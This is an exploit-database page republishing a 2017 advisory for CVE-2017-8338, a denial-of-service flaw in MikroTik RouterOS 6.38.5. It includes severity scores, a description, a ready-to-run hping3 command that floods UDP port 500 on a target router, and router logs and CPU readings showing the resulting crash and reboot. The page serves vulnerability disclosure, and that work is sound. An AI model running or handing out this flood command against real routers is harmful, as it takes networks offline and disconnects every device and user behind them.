MikroTik UDP Flood Denial of Service

2017.05.10
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-400


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################ #Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure #Reference: https://www.vulnerability-lab.com/get_content.php?id=2064 #CVE: CVE-2017-8338 #CWE: CWE-400 #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ #Version : V-6.38.5 #Exploit Tested on: Parrot Security OS #Date: 09-05-2017 #Category: Network Appliance #Author Mail : hosein.askari@aol.com #Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically. ############### Proof of Concept (PoC): The denial of service vulnerability can be exploited by remote attackers without user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. hping3 --udp -p 6000 --destport 500 --flood [router's IP] ######################### #Log: apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot apr/27/2017 04:37:47 system,error,critical out of memory condition was detected apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer ######################## #The sample of "CPU Usage" : [admin@MikroTik] > system resource monitor cpu-used: 100% cpu-used-per-cpu: 100% free-memory: 2487KiB

References:

https://www.vulnerability-lab.com/get_content.php?id=2064


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top